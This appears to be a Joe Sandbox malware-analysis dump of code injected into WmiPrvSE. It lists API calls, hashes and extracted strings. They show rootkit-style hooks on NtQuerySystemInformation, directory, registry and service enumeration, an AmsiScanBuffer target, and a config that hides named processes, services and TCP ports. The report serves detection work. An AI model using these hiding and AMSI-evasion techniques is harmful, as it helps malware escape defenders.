8717->8716 8718 1f5a96898cc 9 API calls Is_bad_exception_allowed 8717->8718 8718->8717 8720 1f5a968a899 8719->8720 8732 1f5a968a928 8719->8732 8721 1f5a96898cc Is_bad_exception_allowed 9 API calls 8720->8721 8722 1f5a968a8a2 8721->8722 8723 1f5a96898cc Is_bad_exception_allowed 9 API calls 8722->8723 8724 1f5a968a8bb 8722->8724 8722->8732 8723->8724 8725 1f5a968a8e7 8724->8725 8726 1f5a96898cc Is_bad_exception_allowed 9 API calls 8724->8726 8724->8732 8727 1f5a96898e0 9 API calls 8725->8727 8726->8725 8728 1f5a968a8fb 8727->8728 8729 1f5a968a914 8728->8729 8730 1f5a96898cc Is_bad_exception_allowed 9 API calls 8728->8730 8728->8732 8731 1f5a96898e0 9 API calls 8729->8731 8730->8729 8731->8732 8732->8660 8734 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8733->8734 8735 1f5a968a095 8734->8735 8736 1f5a96898cc Is_bad_exception_allowed 9 API calls 8735->8736 8737 1f5a968a0cd 8736->8737 8738 1f5a9689738 9 API calls 8737->8738 8739 1f5a968a111 8738->8739 8739->8660 8741 1f5a96894b8 

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32 ref: 000001F5A9683811
                                                                • PathFindFileNameW.SHLWAPI ref: 000001F5A9683820
                                                                  • Part of subcall function 000001F5A9683D58: StrCmpNIW.KERNELBASE(?,?,?,000001F5A968272E), ref: 000001F5A9683D70
                                                                  • Part of subcall function 000001F5A9683CA4: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683CB2
                                                                  • Part of subcall function 000001F5A9683CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683CE0
                                                                  • Part of subcall function 000001F5A9683CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D02
                                                                  • Part of subcall function 000001F5A9683CA4: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D1D
                                                                  • Part of subcall function 000001F5A9683CA4: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F5A9683837), ref: 000001F5A9683D3E
                                                                • CreateThread.KERNELBASE ref: 000001F5A9683867
                                                                  • Part of subcall function 000001F5A9681E38: GetCurrentThread.KERNEL32 ref: 000001F5A9681E43
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction ID: 43e42d36b8573717c8116ff8a6dd59fcd96d9bb46e2cbc12d3ddd7db593919fd
                                                                • Opcode Fuzzy Hash: c4f51b7847a1f98021941fe9320a796c4d22ffdd32b47b35cb34ea0b9caf4340
                                                                • Instruction Fuzzy Hash: F71140BC610E3345FB64A720E449BF92AB3AF54385F50B3399B07439A5DF78C0358601

                                                                Control-flow Graph

                                                                control_flow_graph 18 1f5a9683d58-1f5a9683d63 19 1f5a9683d7d-1f5a9683d84 18->19 20 1f5a9683d65-1f5a9683d78 StrCmpNIW 18->20 20->19 21 1f5a9683d7a 20->21 21->19
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LMX
                                                                • API String ID: 0-1475574623
                                                                • Opcode ID: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction ID: b28281dc9a93e7a59c18d31d09aae87c825c50d882c57effe7d94c8ad05cf78a
                                                                • Opcode Fuzzy Hash: b4da42a706a87f17c2f2cfefd8112183663bfed5671a2c80788db3ec5171a75c
                                                                • Instruction Fuzzy Hash: 41D05E38311E578AEF54AFA188C0AF02B729F04714F88A2358A0607100DF5989ADC750
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction ID: c5b317edb167a8703877f44c046b5b2e6377dfea13685574367ef2a65a746f2b
                                                                • Opcode Fuzzy Hash: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction Fuzzy Hash: 0A91167AB01A6287EB648F25E540BBDB3A2FF54B94F5492359F4B07784DA38D862C700

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 000001F5A9681724: GetProcessHeap.KERNEL32 ref: 000001F5A968172F
                                                                  • Part of subcall function 000001F5A9681724: HeapAlloc.KERNEL32 ref: 000001F5A968173E
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96817AE
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96817DB
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96817F5
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681815
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681830
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681850
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968186B
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A968188B
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96818A6
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A96818C6
                                                                • SleepEx.KERNELBASE ref: 000001F5A9681BDB
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A96818E1
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681901
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968191C
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A968193C
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681957
                                                                  • Part of subcall function 000001F5A9681724: RegOpenKeyExW.ADVAPI32 ref: 000001F5A9681977
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A9681992
                                                                  • Part of subcall function 000001F5A9681724: RegCloseKey.ADVAPI32 ref: 000001F5A968199C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                • String ID:
                                                                • API String ID: 948135145-0
                                                                • Opcode ID: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction ID: d8c7286c65cf9e935b76d6461519feafe78fa224f3ea176f193de50106bf97b8
                                                                • Opcode Fuzzy Hash: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction Fuzzy Hash: AC31DFB9200E2341FB509B22D5E43F957B6AF88BD4F16A6319F0B97696DE14C4708391

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                • API String ID: 3153948470-3850299575
                                                                • Opcode ID: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction ID: 1ba108010db43734c0dcef9b5a5edba691ac314f21ac6bebab9cf082a9187ebd
                                                                • Opcode Fuzzy Hash: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction Fuzzy Hash: ACA17F7A220EA681EB549F25D540BF96BB6FF44BC4F50A226EF4A57798DE34CC60C340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: de5a275b32af45d115b24bcd90eb4bafcc35652886522a6b7213aca4867b91de
                                                                • Instruction ID: ba1c8e2f2bae9b52221b521932163d09426327ea552598f499eb1170f5199f36
                                                                • Opcode Fuzzy Hash: de5a275b32af45d115b24bcd90eb4bafcc35652886522a6b7213aca4867b91de
                                                                • Instruction Fuzzy Hash: 0A316F7A204F928AEB609F60E8503ED7371FB84748F44522ADB5E4BB98DF38C558C710
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: 392e704d5fe8c3ada142f8273b0c6ad9d4e3e3ebca39cb4030b279e164533c73
                                                                • Instruction ID: 265af7fa073f63cced41a4d1e94f6281b8e964120e5e1d5d0e8d733dbf0c3657
                                                                • Opcode Fuzzy Hash: 392e704d5fe8c3ada142f8273b0c6ad9d4e3e3ebca39cb4030b279e164533c73
                                                                • Instruction Fuzzy Hash: C0315E3A214F9285EB608F25E8403EE77B1FB89794F545225EB9E47B98DF38C155CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Free
                                                                • String ID:
                                                                • API String ID: 3168794593-0
                                                                • Opcode ID: f3e0de64b65f5cd8790649c543bda011a5d3b766c0670fbc4556caf0ac72903c
                                                                • Instruction ID: adce5e3564c6a7d5c25b20aecfcf905a1bd8433ecf91a4a6759b673bab9f0196
                                                                • Opcode Fuzzy Hash: f3e0de64b65f5cd8790649c543bda011a5d3b766c0670fbc4556caf0ac72903c
                                                                • Instruction Fuzzy Hash: EA015736610FA2C6EB04DF6AE8081ADB7B2FB89FC9B095535DB5A47725CE34D062C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: 8df48a55f94b131e811e19ece6cc07fdaf9e855ab457e00368d898171dffc6f8
                                                                • Instruction ID: b8473ececef532b8b29e6d1625c697b9a073648e87b1f68ae08b681166ed28a6
                                                                • Opcode Fuzzy Hash: 8df48a55f94b131e811e19ece6cc07fdaf9e855ab457e00368d898171dffc6f8
                                                                • Instruction Fuzzy Hash: FA111C3A714F128AEF008B60E8943E833B4FB19798F441A31DB6E47BA8DF78C1648340
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: ExceptionRaise_clrfp
                                                                • String ID:
                                                                • API String ID: 15204871-0
                                                                • Opcode ID: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction ID: 37250cea008fefea2f8e2036e3f9973f7bb6ce005b1595a0860a632816df0cb3
                                                                • Opcode Fuzzy Hash: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction Fuzzy Hash: 59B14D77210BA68BEB15CF2DC8463AC7BB1F744B88F159A21DB5A877A4CB39C461C740
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .CRT$XIZ$ta$6
                                                                • API String ID: 0-322923984
                                                                • Opcode ID: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction ID: 4865671cf4500982147bc944788eb6f09799dcbcd743d682cf2d1a11fe280523
                                                                • Opcode Fuzzy Hash: af941bbd925a70d38f6486cb6656ede44cc86a8b1b8ec346851b17c5dcdcb7d3
                                                                • Instruction Fuzzy Hash: A0A17F7A210EA682EB588F25D4507F963B6FB44B94F446226EF4A53798EF34CDA0C740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: _clrfp
                                                                • String ID:
                                                                • API String ID: 3618594692-0
                                                                • Opcode ID: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction ID: 4ff693c7a892930f9efb3611fa51ed2429301f1544fea429641e286efdb14ecb
                                                                • Opcode Fuzzy Hash: 3fb59a9a99bc2d764a2805e064b6feaa44c8abd426add4eecb44b81d3d10b4c7
                                                                • Instruction Fuzzy Hash: 04B15D77200BD58BEB19CF29C8867AC7BB1F784B48F149A25DB5A877A4CB39C461C700
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2ef49b89a962db8d8e320cc7c94e283ffa9c3c105420e2d770fa47da1115c244
                                                                • Instruction ID: 94910206100de8bec8189ea12e41015661ab9d1d340f3f7027b03400d909060b
                                                                • Opcode Fuzzy Hash: 2ef49b89a962db8d8e320cc7c94e283ffa9c3c105420e2d770fa47da1115c244
                                                                • Instruction Fuzzy Hash: 4151C436700AA185EB209B72E8547EE7FF6FB447D4F149225EF5A27A99CA38C411C700
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cccc5a6f2ca28c5c2185d4e81174855bb5d6027bbc1350ce747bbf740284351b
                                                                • Instruction ID: c4d33393a373285f937e52fcd94ecd0e903e21a48e021fd92c6bbe65ab2da745
                                                                • Opcode Fuzzy Hash: cccc5a6f2ca28c5c2185d4e81174855bb5d6027bbc1350ce747bbf740284351b
                                                                • Instruction Fuzzy Hash: EE51D436700BA195FB209F72A8406EA7BB6FB44BD8F145225EF5A67B95DB38C421C700
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81c9ccf06db882c3359a48238ba82c88040a2c559c1c74743137ffd670966646
                                                                • Instruction ID: 54726d5d4436734cdeb4f11f492d78ba63180bf024bda3f50cd2d4ea3dd7aef7
                                                                • Opcode Fuzzy Hash: 81c9ccf06db882c3359a48238ba82c88040a2c559c1c74743137ffd670966646
                                                                • Instruction Fuzzy Hash: FAF062B57146A58ADFA88F2CA80376977E1F7583C0F909539E78A83F04D73C80A08F04

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                • String ID: SOFTWARE\$LMXconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                • API String ID: 2135414181-4142111819
                                                                • Opcode ID: 0f6af3d613b5716d2d939483ea722be53918ea7012dfc8c5f10971523ef45b65
                                                                • Instruction ID: 23a07c552c9a8ebd74313c85f08840be843496768e8c2481701ab8ef010fd4a1
                                                                • Opcode Fuzzy Hash: 0f6af3d613b5716d2d939483ea722be53918ea7012dfc8c5f10971523ef45b65
                                                                • Instruction Fuzzy Hash: 0D71F83A211F6285EB109F65E8906E927B6FB84B88F416231DB4F5BB68DF34C464C340

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 000001F5A9681E43
                                                                  • Part of subcall function 000001F5A96821BC: GetModuleHandleA.KERNEL32(?,?,?,000001F5A9681E75), ref: 000001F5A96821D4
                                                                  • Part of subcall function 000001F5A96821BC: GetProcAddress.KERNEL32(?,?,?,000001F5A9681E75), ref: 000001F5A96821E5
                                                                  • Part of subcall function 000001F5A9686040: GetCurrentThreadId.KERNEL32 ref: 000001F5A968607B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                 • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                 • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                • API String ID: 4175298099-4225371247
                                                                • Opcode ID: 0ae55a427d3c7638901636e96ace1ea4cd02cde3c5f2ef49fd533f815a552372
                                                                • Instruction ID: a06507850a88a8c26494303d630f9c7c57c4b121417573e73ee776fd809f5f12
                                                                • Opcode Fuzzy Hash: 0ae55a427d3c7638901636e96ace1ea4cd02cde3c5f2ef49fd533f815a552372
                                                                • Instruction Fuzzy Hash: 814158BC110D6BA4EB04EBA4E8517F42B73AF50384F90B633E70B1B566DE788269C350

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                • String ID: d
                                                                • API String ID: 2005889112-2564639436
                                                                • Opcode ID: 02ec3d665714d09de72fd30cd7b2591f2c5e9e5f28d6ed2dc8e5957e6ee26e2f
                                                                • Instruction ID: 13a72e075ba63b86df87a58be7acb07be05016b5642c0811fa7e3ac42aa3231c
                                                                • Opcode Fuzzy Hash: 02ec3d665714d09de72fd30cd7b2591f2c5e9e5f28d6ed2dc8e5957e6ee26e2f
                                                                • Instruction Fuzzy Hash: DE513036200B9686EB54CF65E4483AAB7B2FB89FC9F049224DB5A47728DF38C0598740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
